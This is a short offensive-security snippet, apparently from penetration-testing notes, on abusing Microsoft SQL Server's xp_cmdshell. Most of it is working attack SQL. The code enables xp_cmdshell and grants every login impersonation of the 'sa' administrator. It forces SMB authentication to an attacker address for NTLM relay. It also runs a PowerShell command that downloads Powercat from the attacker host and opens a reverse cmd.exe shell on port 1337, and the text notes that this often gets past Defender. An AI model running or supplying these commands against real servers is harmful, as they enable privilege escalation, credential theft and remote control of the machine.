MS SQL includes the xp_cmdshell “extended”procedure, which allows a shell command to be called. This is disabled by default, but if enabled it can be used in a trigger to provide persistence on database activity. Powercat, a re-implementation of netcat in pure PowerShell, is useful here.
-- Enable MS SQL "advanced options"--sp_configure 'Show Advanced Options',1;RECONFIGURE;-- Enable xp_cmdshell stored procedure--sp_configure 'xp_cmdshell',1;RECONFIGURE;--- OPTIONAL: Allow all users to impersonate the "sa" (database--- administrator) user (this enables low-privilege website users--- to run xp_cmdshell)---USE master;GRANT impersonate ON login::sa TO [public];-- Coerce MS SQL to connecting using SMB to an attacker at-- 1.2.3.4. Useful for NTLM relay attacks (if SMB signing isn't-- turned on, that is).--EXEC master.sys.xp_dirtree '\\1.2.3.4\share',1,1;-- Download an execute Powercat from an attacker at 1.2.3.4-- (using the built-in Python web server) and connect back to-- that IP on port 1337. Note that this in general should be-- caught by IDS/IDP systems, including Defender... But I've-- actually had it work for me out-of-the-box a surprising-- number of times.--EXEC master.sys.xp_cmdshell 'powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString(''http://1.2.3.4:8000/powercat.ps1''); powercat -c 1.2.3.4 -p 1337 -e cmd.exe"'